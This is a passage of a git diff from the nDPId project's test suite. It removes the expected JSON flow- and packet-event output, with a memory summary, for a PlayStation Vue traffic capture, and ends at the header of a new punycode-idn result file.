WAN3HGtcTu1fFHDLApn4cYn5v7\/OFMUudlO+kwAz6YYUP\/xKnMxM0aw2NmipGe60RO8mQRgiNA3UjgUttdn3TkoUAeWt3POhMkq78nBtgdYoyCPswFscsMPOibkZ+YVxcQYlfS6xgKQllJVJyh4XV\/1SgmDt4Zk2aQ6ziksT4Gt1NXz\/4VNbaIw1Wkx+AuKodZIWi4RYsqLH\/d5MkQyYP795QYgLMaeEeBMMIW3vIDD62sjwEMTZ0eYSJL7ZKTFXwOJyk9ru\/Z4L\/21loJX+I35J7akZTYxAoHO1\/txR8NWcZmyDO3V\/e24Y02BRNiy\/DCSilhBbmMq0Qj1l2nHrZMtJtl4hfcR4D3zYVx\/x5RinF4P5l4xVTrzQoW04eq87iU7aLPCLBnC1BhyQIWPBjqB7fFtdNgVr3XxFQifRRKDIf72Hxc4L747vw83SBK\/pg\/aeLFGt1d26emQllvylYMur1PBBGkKcDvPXhZ1I6UdqislrUbMczCSHyprNZJ5KgaZWI2UhiZDCh0RnOa7+kiKGsUmp6\/QrQY3B9HOFrGfAEYdO\/\/HxKOgi2VB4l0j63E9WM5LyfNAsmp9D\/xllKt+0Y2y7\/IkMbsKhoxV9hjY2L7uiWvUDZecC58zWZyX9dnZtSBAGbGCFtaIFc4+wysAgDoDp5fH2Gz3ExqGwiiQ1iqFEmVsGQYKbZjWioEglmg=="}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1568831054386,"flow_last_seen":1568831054490,"flow_idle_time":7440000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1318,"flow_tot_l4_payload_len":39578,"flow_avg_l4_payload_len":1236,"midstream":1,"ts_msec":1568831054490,"l3_proto":"ip4","src_ip":"8.252.2.139","dst_ip":"192.168.1.132","src_port":80,"dst_port":59198,"l4_proto":"tcp","ndpi": {"proto":"HTTP.PS_VUE","breed":"Acceptable","category":"Video"},"http": {}}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1568831054386,"flow_last_seen":1568831054490,"flow_idle_time":7440000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1318,"flow_tot_l4_payload_len":39578,"flow_avg_l4_payload_len":1236,"midstream":1,"ts_msec":1568831054490,"l3_proto":"ip4","src_ip":"8.252.2.139","dst_ip":"192.168.1.132","src_port":80,"dst_port":59198,"l4_proto":"tcp","ndpi": {"proto":"HTTP.PS_VUE","breed":"Acceptable","category":"Video"},"http": {}}
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831055576,"flow_last_seen":1568831055576,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1568831055576,"l3_proto":"ip4","src_ip":"209.102.209.13","dst_ip":"192.168.1.132","src_port":443,"dst_port":65112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1568831055576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1568831055576,"pkt":"QJkivOG5AKC8brI7CABFSABHBlJAAO8GIHbRZtENwKgBhAG7\/li+HZhYblTGsFAQfqWgYQAAFQMDABr4Hh7jQY7SKbwko9LFlX\/KNQ3S+SkGYTwZEw=="}
-00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1568831055576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831055576,"pkt":"QJkivOG5AKC8brI7CABFSAAowh4AAO8GpMjRZtENwKgBhAG7\/li+HZh3blTGsFARfqVA3wAA"}
-00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831058486,"flow_last_seen":1568831058486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568831058486,"l3_proto":"ip4","src_ip":"13.33.255.96","dst_ip":"192.168.1.132","src_port":443,"dst_port":55076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1568831058486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831058486,"pkt":"QJkivOG5AKC8brI7CABFSAAownEAAO4GO2gNIf9gwKgBhAG71yS9fOmKSelcQFAQgjI44wAA"}
-01178{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1568831058517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"ts_msec":1568831058517,"pkt":"QJkivOG5AKC8brI7CABFSAJDMqlAAO4GiRUNIf9gwKgBhAG71yS9fOmKSelcQFAYgjJcLAAAFwMDAhYGD4WalIgakHtn\/fJz48T14ncNZ7uSeqw6LgIobuwV5qyoAlzB0Xxl15X65lAPuY2vG\/aw6HXS1Wg0Vb4zdM90xSByqDLDjzGO4MzMfltcjjaGY8iweN5C3LkGLTSU+B6EJv9u1cfYzcLxWCcSUS9Nc7f0W9VEO4rPXP7O+PPru8ETON305TCkhb+6tM6mVd7oWXRNYC2NPhCbFxPcXWpOCn4IyzzfKjVZXIXefkR+XtEnQOplMTeOnFi0QchuJ0si68kEbiQ5z80Vak1dkhJ9+m9n\/i5qI890vKW4cFqAnxOPqXddt9Yx\/bfMl6PYL9m82kzd+iSXQsS8igpw6j+CxghfbNThB42FJ+LNwNblvFh6z9K5rlGsbgfM2wrPBvh17aOviSW4fW\/44tKcwEv8Aupxwy5TZNOiCxYSYCxgkpQ6BwKFtA01I8PGgRsk\/0L2IrvFZ7CfrsuIi\/RD9hyYgVz6uAD5cNemO3OP\/J4FDEDUaN3eM\/bIOJq+\/zD4XosIVk1xWR8n5KORcgDdSul\/mXO33x0nAm2oeowwONKfSArAZMqugxyn6PCjdFXJypJZuXU8mVOMvP+XhxYgqR1dGLO1yzoBeqms5Zb4kM6P7J9gslvEweE2hqt6Cn49JPAI8ecmr\/c1UbJMC1VTQAuxkCj6NFt8kf8H1NTofF2kZ8nJOW\/0tZgZNpLRGY+OlxaYy1ugOZY="}
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831062289,"flow_last_seen":1568831062289,"flow_idle_time":7440000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1568831062289,"l3_proto":"ip4","src_ip":"34.217.165.102","dst_ip":"192.168.1.132","src_port":443,"dst_port":63577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1568831062289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1568831062289,"pkt":"QJkivOG5AKC8brI7CABFCABImQxAACkGLjAi2aVmwKgBhAG7+FlRo0j5C6Rn21AYgjJ23AAAFwMDABtaN0V5Aa+aB6dvvTVw7le63zELX9T\/544IGeY="}
-00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":923,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831063571,"flow_last_seen":1568831063571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1568831063571,"l3_proto":"ip4","src_ip":"63.140.57.73","dst_ip":"192.168.1.132","src_port":443,"dst_port":61267,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":923,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1568831063571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831063571,"pkt":"QJkivOG5AKC8brI7CABFCAAowxcAAO8Gza4\/jDlJwKgBhAG771P3p6tQM3A6VVAQgjLw0wAA"}
-00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1568831063575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831063575,"pkt":"QJkivOG5AKC8brI7CABFAAAowxgAAO8GpBbRZtENwKgBhAG7\/li+HZh4blTGsVAQfqRA3wAA"}
-01372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1568831063589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":737,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":737,"pkt_l4_len":703,"ts_msec":1568831063589,"pkt":"QJkivOG5AKC8brI7CABFCALTjCZAAO8GwfQ\/jDlJwKgBhAG771P3p6tQM3A6VVAYgjLoygAAFwMDAqbQ+95Xvia3wK6UWebemp4er0ZBcKqFiFaKthh\/rILUUSgGBGrL7UK5qkSp5rQMmKvJaUCL4cR8ZQiIeraaShAhEEprxyoLFEvJHLmm3PwfrLapkebggQH8l247Vxv9peHoDj9PyoLH+BNxtShF5NSq57MzROwaWqSKp+ajaw\/CQ9IiEqNb0dRX+heFXoRK0wfbEh1LaX7hcxSG6QsJs+E5y9RHvcexwNVP0b5HrRx1sHIeIizvftM7Obo2RBoIjX3+wZfDWxqs2ZlF86l+EkJ5Swr6lHdl70KOs1G6JHlv6WH26axKBNdk03ZVAnEbJYPY\/LsfGdL6g+VXG7WQIgMv2ewF0PvE+vVDUFl0RAZ\/1tLcDW7ACT3ksX0LoeHNenBOhZdHqnf9UOziD+Q8zvRnZsqngkzD79qyeMi\/tzZSjltxbVSqkmhzEU9v1Y4BPqMGX0\/t0QAAV\/fprog45tuROab2+eBsC5W+ztNYarbon9rhkpVeoLrqdJhKQbZu\/c9lD89TohT8z3xUcsxzG7N3uUKJnCFMZEaDh46TyHN97xjtK5WpD4wQGnG0hBwwfSJCrIZ+A97Y\/cKfaMMm3rd9+qPHtU9mckB3Gm\/zIiD5yAAOlmp3TAmYbjhBVWzT18gBC+xJgp6sK3g9ErtoNAE4z9KCR6dyaFmm+vyKFQOhPPAuGz3qwp0JPlsMKUNUTpMyrP5r9vz+rqFUTI+UboZa3It1qCmsiunIqJZvwfwNrLaKXkxVBYy+vP2hXL8wM+L6Xe6uVxBuXOCt7cxNH1N3d\/wIcfpixl\/RuDXp39JNsKCBYByXoyBbsGJVG7\/LZ+6v1vHSKeV81o7IFGvt97IZrQYbdcUI5pk1Qvk6dAxViurUUxja5\/aS4mnkbaCn09PwETAx1nI="}
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831063828,"flow_last_seen":1568831063828,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1568831063828,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":55648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1568831063828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1568831063828,"pkt":"QJkivOG5AKC8brI7CABFCABHowhAADEGc8AXOVl7wKgBhAG72WDabivvm96\/y1AYgjJsJQAAFQMDABqR742fBpyPZjtEfbqDeBewXB+uHjYt8SUS1Q=="}
-00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1568831063828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831063828,"pkt":"QJkivOG5AKC8brI7CABFCAAowxsAADEGk8wXOVl7wKgBhAG72WDabiwOm96\/y1ARgjK9fQAA"}
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":928,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831063948,"flow_last_seen":1568831063948,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1568831063948,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":62694,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1568831063948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1568831063948,"pkt":"QJkivOG5AKC8brI7CABFCABHpH1AADEGcksXOVl7wKgBhAG79ObaKuoS0SNuMlAYgjIMvwAAFQMDABp\/k9+fmQYVGf3Hut7mHezJW979dzhuHOFbOg=="}
-00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1568831063948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831063948,"pkt":"QJkivOG5AKC8brI7CABFCAAowx0AADEGk8oXOVl7wKgBhAG79ObaKuox0SNuMlARgjIAbAAA"}
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":930,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831064128,"flow_last_seen":1568831064128,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1568831064128,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":52217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1568831064128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1568831064128,"pkt":"QJkivOG5AKC8brI7CABFCABH4exAADEGNNwXOVl7wKgBhAG7y\/nZ6b0aK\/hlyVAYgjIsbgAAFQMDABqvyMBTvXIi2chxG9Ya8G+SxcFk923Cg7zTOg=="}
-00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1568831064128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831064128,"pkt":"QJkivOG5AKC8brI7CABFCAAowx8AADEGk8gXOVl7wKgBhAG7y\/nZ6b05K\/hlyVARgjIEJwAA"}
-00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1568831068497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1568831068497,"pkt":"QJkivOG5AKC8brI7CABFSAAow6oAAO4GOi8NIf9gwKgBhAG71yS9fOulSelfaVAQgjIznwAA"}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831063948,"flow_last_seen":1568831063948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":62694,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831063948,"flow_last_seen":1568831063948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":62694,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568831058486,"flow_last_seen":1568831068662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1078,"flow_avg_l4_payload_len":269,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"13.33.255.96","dst_ip":"192.168.1.132","src_port":443,"dst_port":55076,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568831058486,"flow_last_seen":1568831068662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1078,"flow_avg_l4_payload_len":269,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"13.33.255.96","dst_ip":"192.168.1.132","src_port":443,"dst_port":55076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831062289,"flow_last_seen":1568831062289,"flow_idle_time":7440000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"34.217.165.102","dst_ip":"192.168.1.132","src_port":443,"dst_port":63577,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568831062289,"flow_last_seen":1568831062289,"flow_idle_time":7440000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"34.217.165.102","dst_ip":"192.168.1.132","src_port":443,"dst_port":63577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1724,"flow_first_seen":1568831054386,"flow_last_seen":1568831070533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1318,"flow_tot_l4_payload_len":2105073,"flow_avg_l4_payload_len":1221,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"8.252.2.139","dst_ip":"192.168.1.132","src_port":80,"dst_port":59198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.PS_VUE","breed":"Acceptable","category":"Video"}}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831063828,"flow_last_seen":1568831063828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":55648,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831063828,"flow_last_seen":1568831063828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":55648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00597{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831063571,"flow_last_seen":1568831063589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":341,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"63.140.57.73","dst_ip":"192.168.1.132","src_port":443,"dst_port":61267,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831063571,"flow_last_seen":1568831063589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":341,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"63.140.57.73","dst_ip":"192.168.1.132","src_port":443,"dst_port":61267,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831064128,"flow_last_seen":1568831064128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":52217,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1568831064128,"flow_last_seen":1568831064128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"23.57.89.123","dst_ip":"192.168.1.132","src_port":443,"dst_port":52217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1568831055576,"flow_last_seen":1568831063575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"209.102.209.13","dst_ip":"192.168.1.132","src_port":443,"dst_port":65112,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1568831055576,"flow_last_seen":1568831063575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1568831070533,"l3_proto":"ip4","src_ip":"209.102.209.13","dst_ip":"192.168.1.132","src_port":443,"dst_port":65112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1740,"source":"ps_vue.pcap","alias":"nDPId-test","total-events-serialized":45}
-~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
-~~ packets captured/processed: 1740/1740
-~~ skipped flows.............: 0
-~~ total layer4 data length..: 2106990 bytes
-~~ total detected protocols..: 1
-~~ total active/idle flows...: 8/8
-~~ total timeout flows.......: 0
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5263669 bytes
-~~ total memory freed........: 5263669 bytes
-~~ total allocations/frees...: 101352/101352
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ json string min len.......: 162 chars
-~~ json string max len.......: 2251 chars
-~~ json string avg len.......: 1276 chars
diff --git a/test/results/punycode-idn.pcap.out b/test/results/punycode-idn.pcap.out
new file mode 100644
index 000000000..49147438f
--- /dev/null
+++ b/test/results/punycode-idn.pcap.out
@@ -0,0 +1,35 @@
